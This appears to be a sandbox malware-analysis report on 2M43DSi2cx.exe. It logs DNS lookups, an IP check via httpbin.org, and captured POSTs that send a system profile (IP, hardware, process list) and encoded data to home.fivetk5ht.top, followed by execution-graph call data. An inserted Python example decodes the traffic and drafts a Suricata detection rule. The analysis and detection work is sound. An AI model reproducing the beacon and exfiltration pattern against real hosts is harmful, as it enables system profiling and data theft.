Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:44:36.506347895 CET | 1.1.1.1 | 192.168.2.10 | 0x4c | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 16:44:36.506347895 CET | 1.1.1.1 | 192.168.2.10 | 0x4c | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:40.709120989 CET | 1.1.1.1 | 192.168.2.10 | 0x5ca5 | No error (0) | httpbin.org | - | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:40.709120989 CET | 1.1.1.1 | 192.168.2.10 | 0x5ca5 | No error (0) | httpbin.org | - | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:44.241940022 CET | 1.1.1.1 | 192.168.2.10 | 0xc2c6 | No error (0) | home.fivetk5ht.top | - | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:46.754834890 CET | 1.1.1.1 | 192.168.2.10 | 0xe752 | No error (0) | home.fivetk5ht.top | - | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                              • httpbin.org
                                                              • home.fivetk5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49724 | 185.121.15.192 | 80 | 7688 | C:\Users\user\Desktop\2M43DSi2cx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:44:44.366157055 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
Host: home.fivetk5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 501222
                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:44:44.486063957 CET | 2472 | OUT | Data Raw: 36 6c 4f 31 6f 71 54 58 37 6c 34 43 65 43 57 62 65 50 66 47 47 59 38 48 35 52 6e 6d 58 35 44 69 4d 73 34 62 78 6e 45 74 58 47 5a 6c 51 78 4f 4a 6f 7a 77 2b 44 7a 50 4a 38 72 6c 68 71 64 50 43 2b 5c 2f 37 61 64 58 4f 4b 4e 53 4d 70 4f 4d 46 54 6f
                                                              Data Ascii: 6lO1oqTX7l4CeCWbePfGGY8H5RnmX5DiMs4bxnEtXGZlQxOJozw+DzPJ8rlhqdPC+\/7adXOKNSMpOMFTo1LvmcU\/wOor+xn\/h1d+wX\/wBEIH\/hzvjJ\/wDPDo\/4dXfsF\/8ARCB\/4c74yf8Azw6\/mj\/ifHhP\/ogeIv8Aw55b\/wDIev8AT0\/rn\/im1xt\/0crhb\/w0Zt\/8n6\/09P45qjk7fj\/Sv0v\/AGr\
                                                              Dec 20, 2024 16:44:44.486107111 CET | 2472 | OUT | Data Raw: 38 4f 66 38 41 50 48 36 5c 2f 79 44 6f 49 63 6e 33 5c 2f 41 4f 5c 2f 50 5c 2f 77 42 65 6f 5a 50 39 76 39 34 4f 63 43 72 4f 33 2b 50 38 65 6e 34 34 7a 54 50 4c 36 66 50 73 5c 2f 77 41 6e 73 4d 55 46 66 38 75 66 2b 33 53 70 49 33 6d 62 5c 2f 6e 44
                                                              Data Ascii: 8Of8APH6\/yDoIcn3\/AO\/P\/wBeoZP9v94OcCrO3+P8en44zTPL6fPs\/wAnsMUFf8uf+3SpI3mb\/nD\/AL3\/AJZA1Hudl2Z\/z9f8\/nT\/AO\/8nyZ6+b69\/wCf86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/AJH2+b\/y0H4fXrTPn+V\/9c5\/1v8An\/Papec7\/wB5\/nn7V\/X\/AOvTZIz8nz4cf5\/Oont8
                                                              Dec 20, 2024 16:44:44.486502886 CET | 2472 | OUT | Data Raw: 36 75 66 39 52 5c 2f 6e 33 7a 5c 2f 41 50 58 71 4a 76 76 4f 6a 76 38 41 39 74 50 77 6f 41 67 57 4d 5c 2f 77 45 37 78 47 54 35 6b 6e 5c 2f 41 4c 61 57 6e 39 50 79 78 7a 52 78 5c 2f 77 42 4d 5c 2f 77 44 70 72 5c 2f 7a 77 5c 2f 77 43 76 71 37 5c 2f
                                                              Data Ascii: 6uf9R\/n3z\/APXqJvvOjv8A9tPwoAgWM\/wE7xGT5kn\/ALaWn9PyxzRx\/wBM\/wDpr\/zw\/wCvq7\/Dp\/PFTRxyM2392zx+megqGP5pP7\/l9pPXn+nvWfs\/P8P+CaU+vy\/UZ88caRo8Y\/e3P7z\/AJ7fj6+v0xRn+NHkheX975n+ogGf59+Ke0nzMn344\/3X+q47\/wClZ9KfJG67Nifz+0fXt7f\/AFzWZofuQ\/
                                                              Dec 20, 2024 16:44:44.486782074 CET | 2472 | OUT | Data Raw: 34 6c 36 37 38 4e 72 37 77 7a 4e 34 73 6a 38 61 52 79 58 57 6a 65 48 50 43 50 69 5a 4e 55 74 4e 63 54 77 37 34 56 61 53 33 75 72 4c 78 66 5a 77 74 62 54 61 4e 42 4a 62 33 56 72 63 71 4a 4c 69 49 78 54 50 5c 2f 41 43 6d 5c 2f 38 46 50 5c 2f 41 41
                                                              Data Ascii: 4l678Nr7wzN4sj8aRyXWjeHPCPiZNUtNcTw74VaS3urLxfZwtbTaNBJb3VrcqJLiIxTP\/ACm\/8FP\/AAz8Gv2XPDvwR\/YL+G\/w88DS\/Ej4P+FtD8ZftFfHgeAtFs\/H\/j74keMdJfXLfw\/YeNrvSl8WzeBtLstfn1O10waxc6Q9rqHhnSGQ3Xg9nb7U\/wCCaHxq0n4E\/wDBMbxZ4u1n9qT\/AIZItdR\/bw13w5H8R
                                                              Dec 20, 2024 16:44:44.486810923 CET | 2472 | OUT | Data Raw: 45 5c 2f 58 38 50 36 6d 6a 32 66 6e 2b 48 5c 2f 41 41 54 6f 4b 33 6c 65 79 5c 2f 6c 5c 2f 39 61 6b 4b 37 65 4f 33 62 5c 2f 50 57 70 36 4e 75 37 6a 46 61 47 33 74 66 4f 58 39 66 4d 72 31 48 4a 32 5c 2f 47 70 57 58 48 42 35 42 71 4b 54 74 2b 4e 42
                                                              Data Ascii: E\/X8P6mj2fn+H\/AAToK3ley\/l\/9akK7eO3b\/PWp6Nu7jFaG3tfOX9fMr1HJ2\/GpWXHB5BqKTt+NBrDf5fqiOiiig1K9FFFBpT6\/Ij8v3\/T\/wCvUL\/dP4fzFWqr0GhFsPt\/n8KQqV5z3\/GpqQru9fwqOdef9fM09p5fj\/wCntH94f5\/GmVYqLYfb\/P4VZ2EEnb8f6VB3f6D+VWmXPB4IqFlxweQaAGP90\/h\
                                                              Dec 20, 2024 16:44:44.486836910 CET | 2472 | OUT | Data Raw: 66 76 38 41 35 78 2b 76 62 74 54 6d 2b 62 66 43 37 6c 50 73 5c 2f 77 43 36 78 5c 2f 6e 38 36 44 6f 47 66 36 36 4e 39 5c 2f 33 49 5c 2f 77 42 36 66 36 66 35 5c 2f 4f 71 79 79 2b 59 7a 5c 2f 4e 35 61 52 5c 2f 38 41 4c 54 7a 66 39 66 38 41 35 37 38
                                                              Data Ascii: fv8A5x+vbtTm+bfC7lPs\/wC6x\/n86DoGf66N9\/3I\/wB6f6f5\/Oqyy+Yz\/N5aR\/8ALTzf9f8A5788VNJ5kfyf8++JovL5nz\/nr3pkm\/c7\/wAeRFiOb\/U8+lADP3nmTfufk\/5ZcefB\/nt7+tC7JI3\/AIX\/ANH8r97+4m\/P\/l+P9O3aaST5cfcTzcf9N+3+i9uP84pkjf303\/8ALb93\/wAsf\/11PtfOX9f
                                                              Dec 20, 2024 16:44:44.486865044 CET | 2472 | OUT | Data Raw: 66 7a 2b 52 55 55 55 5c 2f 59 66 62 5c 2f 50 34 55 41 66 32 76 58 45 76 50 58 76 5c 2f 41 46 2b 76 58 39 65 75 4b 2b 55 4e 52 6c 7a 34 72 38 53 48 5c 2f 71 59 64 5a 5c 2f 48 64 71 4e 31 6a 38 6a 39 61 2b 68 39 49 38 53 61 4a 34 70 30 6e 53 5c 2f
                                                              Data Ascii: fz+RUUU\/Yfb\/P4UAf2vXEvPXv\/AF+vX9euK+UNRlz4r8SH\/qYdZ\/HdqN1j8j9a+h9I8SaJ4p0nS\/EXhzVtP13QdYtob\/S9W0u6hvtP1CzmG6O4tbqB3imjYZBKscOCrbWDAflnY\/ts\/s4NcTXeofE0m4uZ5Lm4kbwf4+dpJppWllkbZ4WbLOzMx9ya\/wCJSHhV4teI9XM8DwB4YeIvHWL4bxtKlxHhuDuCeJeJq\/
                                                              Dec 20, 2024 16:44:44.486890078 CET | 2472 | OUT | Data Raw: 76 45 33 37 4b 50 37 52 50 68 37 77 74 34 62 38 4e 61 5a 66 36 31 34 6a 38 51 65 49 39 61 2b 45 50 6a 44 54 64 45 30 50 51 4e 48 30 75 47 35 31 50 56 74 62 31 62 55 37 6d 31 73 4e 4b 30 33 54 72 65 34 76 72 2b 2b 75 49 4c 57 30 68 6c 75 4a 59 34
                                                              Data Ascii: vE37KP7RPh7wt4b8NaZf614j8QeI9a+EPjDTdE0PQNH0uG51PVtb1bU7m1sNK03Tre4vr++uILW0hluJY42\/wm+k5gMJmn0jfpDYDHUvb4TE8W8DwrUlUq0nJR8D\/COpG1WhOnVg4zhGSlTqRkmlZn\/UX9F\/ijPODfoh\/s\/eJ+GsasuzvKfA7xWr4DGSwuCxsaNSp9NX6XeGqc+DzHD4vA4mnUoVqtKpRxWGrUZwqSjKD
                                                              Dec 20, 2024 16:44:44.486938000 CET | 4944 | OUT | Data Raw: 54 61 5c 2f 79 62 2b 50 38 41 56 2b 64 2b 5a 5c 2f 44 74 78 36 56 50 4f 5c 2f 4c 2b 76 6d 64 68 54 2b 52 74 6e 38 59 5c 2f 6e 5c 2f 58 5c 2f 41 43 65 76 64 5a 50 37 32 2b 50 39 35 4b 50 4e 6b 5c 2f 7a 69 6e 5a 78 76 58 5c 2f 6e 6c 5c 2f 77 44 57
                                                              Data Ascii: Ta\/yb+P8AV+d+Z\/Dtx6VPO\/L+vmdhT+Rtn8Y\/n\/X\/ACevdZP72+P95KPNk\/zinZxvX\/nl\/wDWpmP3bvu3v5v6fy\/x+tamvOvP+vmMPK70mjT\/AJY+X\/h\/X+lMbf5n994\/+ef+fx71NjG\/D\/8Abv5WfJ\/l7\/5NMk8tdn+s8zvHHx0\/z\/8AXoLK3coU3pj\/AFn+f89+hNQtH8\/k7POeT\/tv78f5+tX
                                                              Dec 20, 2024 16:44:44.605995893 CET | 7416 | OUT | Data Raw: 39 49 75 76 48 5c 2f 69 33 58 4e 4b 38 50 61 52 70 69 33 74 76 6f 57 6b 79 36 33 34 7a 75 4c 62 77 76 50 39 54 51 38 63 5c 2f 43 7a 45 30 73 4c 57 6f 63 63 5a 52 55 6a 6a 59 53 71 59 4f 4b 65 4c 56 62 45 30 6f 66 32 58 65 74 52 77 38 73 49 71 38
                                                              Data Ascii: 9IuvH\/i3XNK8PaRpi3tvoWky634zuLbwvP9TQ8c\/CzE0sLWoccZRUjjYSqYOKeLVbE0of2XetRw8sIq86LhnWVVoVo03SqYfHUcTCcsO5VI\/L1\/o6+NmFddV\/DvPaccLLkxFb\/YpYajVVLG1p0KmKhi5YeGJpQy\/GRrYZ1VXoVaSoVqcK9WlTqc7RWVBqeNF8Marqd94f0vUPGmqa8vhPwbLqesSeN9e8FeH9S1HQZ\/
                                                              Dec 20, 2024 16:44:45.656512976 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                              Session ID: 1 | Source: 192.168.2.10:49730 | Destination: 185.121.15.192:80 | PID: 7688 | Process: C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 20, 2024 16:44:46.876199961 CET | 284 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                              Host: home.fivetk5ht.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 143
                                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                              Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                              Dec 20, 2024 16:44:48.151928902 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                              Session ID: 0 | Source: 192.168.2.10:49713 | Destination: 34.226.108.155:443 | PID: 7688 | Process: C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-20 15:44:42 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                              Host: httpbin.org
                                                              Accept: */*
                                                              2024-12-20 15:44:42 UTC | 224 | IN | HTTP/1.1 200 OK
                                                              Date: Fri, 20 Dec 2024 15:44:42 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 31
                                                              Connection: close
                                                              Server: gunicorn/19.9.0
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: true
                                                              2024-12-20 15:44:42 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                              Data Ascii: { "origin": "8.46.123.189"}
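The traffic listing above gives each row as timestamp, byte count, direction and payload, with payloads shown as "Data Raw:" hex dumps, and the listing itself supports two observations: the "ip" the sample POSTs is the "origin" httpbin.org returned one second earlier, and the follow-up POST's "id1" carries the server's 503 body back verbatim. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses rows in the report's format, decodes the hex dumps, flattens the host-profile JSON into the fields an analyst keeps (decoding current_time so it can be compared with the capture timestamps), and checks both observations against the bytes the report shows. The sample rows and hex dumps are copied from the listing; the beacon JSON is a constructed, abbreviated copy (the report truncates the process list); the Suricata rule and its sid are an assumed detection, not a signature from the report.

```python
"""Parse Joe Sandbox HTTP-traffic rows and pull IOCs from the captured beacon.

Added example, not code from the Joe Sandbox report or from the sample. The report
exports each traffic row as "<timestamp><bytes><IN|OUT><data>" run together (or, once
separated, as "ts | bytes | dir | data") and shows payloads as "Data Raw:" hex dumps.
"""
import json
import re
from datetime import datetime, timezone

ROW_RE = re.compile(r"^(?P<ts>.*?\b(?:CET|UTC))(?P<nbytes>\d+)(?P<direction>IN|OUT)(?P<data>.*)$")

# Rows copied from the report's traffic listing: the httpbin.org session and the
# request/reply lines of the session to home.fivetk5ht.top.
SAMPLE_ROWS = [
    "2024-12-20 15:44:42 UTC52OUTGET /ip HTTP/1.1",
    "Host: httpbin.org",  # header line, not a row
    "2024-12-20 15:44:42 UTC224INHTTP/1.1 200 OK",
    "2024-12-20 15:44:42 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a",
    "Dec 20, 2024 16:44:46.876199961 CET284OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1",
    "Dec 20, 2024 16:44:48.151928902 CET212INHTTP/1.0 503 Service Unavailable",
]
HTTPBIN_RAW = "7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a"
REPLY_503_RAW = (  # body of the 503 the server returned, as dumped in the report
    "3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 "
    "55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 "
    "61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a "
    "3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a"
)
FOLLOWUP_RAW = (  # body of the next POST (Content-Length: 143), as dumped in the report
    "7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 "
    "53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 "
    "73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 "
    "74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e "
    "5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d"
)
# Constructed, abbreviated copy of the profile the sample POSTed: the field values the
# report shows, but only four of the processes it lists.
BEACON_BODY = (
    '{ "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, '
    '"drivers": [ { "name": "C:\\\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, '
    '"resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ '
    '{ "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, '
    '{ "name": "Registry", "pid": 92 }, { "name": "lsass.exe", "pid": 628 } ] }'
)

def parse_row(line):
    """Split one traffic row; returns None for header and continuation lines."""
    line = line.strip()
    parts = line.split(" | ", 3)
    if len(parts) == 4 and parts[1].isdigit() and parts[2] in ("IN", "OUT"):
        return {"ts": parts[0], "bytes": int(parts[1]), "dir": parts[2], "data": parts[3]}
    m = ROW_RE.match(line)
    if not m:
        return None
    return {"ts": m["ts"], "bytes": int(m["nbytes"]), "dir": m["direction"], "data": m["data"]}

def parse_rows(lines):
    return [row for row in map(parse_row, lines) if row]

def decode_raw(dump):
    """Turn a 'Data Raw: 7b 20 ...' hex dump (or bare hex) into bytes."""
    return bytes.fromhex(dump.split("Data Raw:", 1)[-1].strip())

def beacon_summary(body):
    """Flatten the host-profile JSON the sample POSTed into the fields an analyst keeps."""
    doc = json.loads(body)
    return {
        "external_ip": doc["ip"],
        # current_time is a Unix timestamp; decode it to compare with the capture times
        "sent_at": datetime.fromtimestamp(int(doc["current_time"]), tz=timezone.utc),
        "cpus": doc["Num_processor"],
        "ram_gb": doc["Num_ram"],
        "drives": {d["name"]: (d["all"], d["free"]) for d in doc["drivers"]},
        "displays": (doc["Num_displays"], doc["resolution_x"], doc["resolution_y"]),
        "recent_files": doc["recent_files"],
        "processes": [p["name"] for p in doc["processes"]],
    }

def ip_lookup_feeds_beacon(httpbin_raw, beacon_body):
    """True if the 'ip' in the beacon is the 'origin' httpbin.org returned just before it."""
    return json.loads(decode_raw(httpbin_raw))["origin"] == json.loads(beacon_body)["ip"]

def echoes_server_reply(followup_raw, reply_raw):
    """True if the follow-up POST's 'id1' is the verbatim body of the server's previous reply."""
    return json.loads(decode_raw(followup_raw))["id1"] == decode_raw(reply_raw).decode()

def suricata_rule(host, body_key, sid):
    """Draft a Suricata rule on the beacon's Host header and one distinctive JSON key.
    The sid is a placeholder: an assumed detection, not a signature from the report."""
    return (
        "alert http $HOME_NET any -> $EXTERNAL_NET any "
        f'(msg:"Host-profile beacon to {host}"; flow:established,to_server; '
        f'http.method; content:"POST"; http.host; content:"{host}"; '
        f'http.request_body; content:"|22|{body_key}|22|"; sid:{sid}; rev:1;)'
    )

if __name__ == "__main__":
    for row in parse_rows(SAMPLE_ROWS):
        print(row["ts"], row["bytes"], row["dir"], row["data"][:60])
    print(beacon_summary(BEACON_BODY))
    print("ip from httpbin:", ip_lookup_feeds_beacon(HTTPBIN_RAW, BEACON_BODY))
    print("echoes 503 body:", echoes_server_reply(FOLLOWUP_RAW, REPLY_503_RAW))
    print(suricata_rule("home.fivetk5ht.top", "Num_processor", 1000001))
```

The row regex anchors on the CET/UTC suffix of the timestamp because that is the only fixed boundary in the glued form; current_time 1734709482 decodes to 2024-12-20 15:44:42 UTC, the same second as the httpbin.org request, so the beacon was assembled immediately after the IP lookup.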



                                                              Target ID:0
                                                              Start time:10:44:37
                                                              Start date:20/12/2024
                                                              Path:C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\2M43DSi2cx.exe"
                                                              Imagebase:0x420000
                                                              File size:4'483'072 bytes
                                                              MD5 hash:98F2F2F0D74571AF72DD4CA43C1692BF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:2.3%
                                                                Dynamic/Decrypted Code Coverage:6.4%
                                                                Signature Coverage:10.7%
                                                                Total number of Nodes:596
                                                                Total number of Limit Nodes:90
                                                                execution_graph 81073 43d5e0 81074 43d652 WSAStartup 81073->81074 81075 43d5f0 81073->81075 81074->81075 81076 43d664 81074->81076 81078 43d67c 81075->81078 81080 43d690 _open 81075->81080 81079 43d5fa 81080->81079 80526 45b400 80527 45b425 80526->80527 80528 45b40b 80526->80528 80531 427770 80528->80531 80529 45b421 80532 427790 80531->80532 80533 4277b6 recv 80531->80533 80532->80533 80535 427799 80532->80535 80534 4277a3 80533->80534 80541 4277d4 80533->80541 80542 4272a0 _open 80534->80542 80535->80534 80537 4277db 80535->80537 80543 4272a0 _open 80537->80543 80539 4277ec 80544 42cb20 _open 80539->80544 80541->80529 80542->80541 80543->80539 80544->80541 80545 45e400 80546 45e412 80545->80546 80550 45e459 80545->80550 80547 45e422 80546->80547 80569 473030 _open 80546->80569 80570 4809d0 _open 80547->80570 80552 45e4a8 80550->80552 80554 45e495 80550->80554 80557 45b5a0 80550->80557 80551 45e42b 80571 4568b0 6 API calls 80551->80571 80554->80552 80556 45b5a0 _open 80554->80556 80556->80552 80558 45b5c0 80557->80558 80561 45b5d2 80557->80561 80559 45b713 80558->80559 80558->80561 80563 45b626 80558->80563 80573 464f40 _open 80559->80573 80561->80554 80562 45b65a 80562->80561 80564 45b72b 80562->80564 80565 45b737 80562->80565 80563->80561 80563->80562 80563->80564 80563->80565 80572 4650a0 _open 80563->80572 80564->80561 80574 4650a0 _open 80564->80574 80565->80561 80575 4650a0 _open 80565->80575 80569->80547 80570->80551 80571->80550 80572->80563 80573->80561 80574->80561 80575->80561 80576 45f100 80577 45f1b8 80576->80577 80579 45f11f 80576->80579 80578 45ff1a 80626 460c80 _open 80578->80626 80579->80577 80581 45f2a3 80579->80581 80588 45f603 80579->80588 80596 45f240 80579->80596 80611 464f40 _open 80581->80611 80583 460045 80583->80577 80586 46010d 80583->80586 80590 46004d 80583->80590 80629 4650a0 _open 80583->80629 80584 45f80d 80587 46015e 80586->80587 80630 4650a0 _open 80586->80630 
80587->80590 80631 4650a0 _open 80587->80631 80588->80578 80588->80583 80588->80584 80589 46008a 80588->80589 80600 460d30 _open 80588->80600 80610 4650a0 _open 80588->80610 80624 42fa50 _open 80588->80624 80625 464fd0 _open 80588->80625 80628 464f40 _open 80589->80628 80632 464f40 _open 80590->80632 80596->80577 80612 427310 80596->80612 80599 45ff5b 80599->80577 80627 4650a0 _open 80599->80627 80600->80588 80602 427310 _open 80608 45f50d 80602->80608 80603 45f3ce 80603->80577 80604 45f491 80603->80604 80621 4650a0 _open 80603->80621 80604->80588 80604->80602 80606 45f5b9 80623 42fa50 _open 80606->80623 80608->80577 80608->80606 80622 4650a0 _open 80608->80622 80610->80588 80611->80577 80613 427320 80612->80613 80617 427332 80612->80617 80614 427390 80613->80614 80613->80617 80634 4272a0 _open 80614->80634 80616 4273a1 80635 42cb20 _open 80616->80635 80620 427380 80617->80620 80633 4272a0 _open 80617->80633 80620->80603 80621->80604 80622->80606 80623->80588 80624->80588 80625->80588 80626->80599 80627->80577 80628->80577 80629->80586 80630->80587 80631->80590 80632->80577 80633->80620 80634->80616 80635->80620 80636 45b3c0 80637 45b3ee 80636->80637 80638 45b3cb 80636->80638 80642 459290 80638->80642 80656 4276a0 80638->80656 80639 45b3ea 80643 4276a0 2 API calls 80642->80643 80644 4592e5 80643->80644 80645 4593c3 80644->80645 80647 4592f3 80644->80647 80650 459392 80645->80650 80667 43d090 _open 80645->80667 80646 4593be 80646->80639 80647->80650 80651 459335 WSAIoctl 80647->80651 80649 4593f7 80668 464f40 _open 80649->80668 80650->80646 80669 4650a0 _open 80650->80669 80651->80650 80654 459366 80651->80654 80654->80650 80655 459371 setsockopt 80654->80655 80655->80650 80657 4276c0 80656->80657 80658 4276e6 send 80656->80658 80657->80658 80659 4276c9 80657->80659 80660 4276d3 80658->80660 80663 427704 80658->80663 80659->80660 80661 42770b 80659->80661 80670 4272a0 _open 80660->80670 80671 4272a0 _open 80661->80671 80663->80639 80665 42771c 80672 42cb20 _open 
